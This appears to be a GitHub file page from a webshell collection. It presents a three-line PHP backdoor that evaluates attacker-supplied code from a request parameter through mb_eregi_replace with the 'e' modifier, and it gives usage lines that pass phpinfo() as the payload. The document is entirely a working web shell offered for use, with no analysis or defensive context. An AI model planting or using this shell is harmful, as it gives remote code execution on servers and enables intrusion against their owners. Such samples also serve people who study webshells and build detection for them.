webshell/php/2020.08.20.15.php
tennc ecc1fb09ee
Create 2020.08.20.15.php
use:
shell.php?e=mb_eregi_replace
post x=phpinfo();
2020-08-20 12:48:04 +08:00

3 lines
64 B
PHP

<?php
mb_eregi_replace('\d', $_REQUEST['x'], '1', 'e');
?>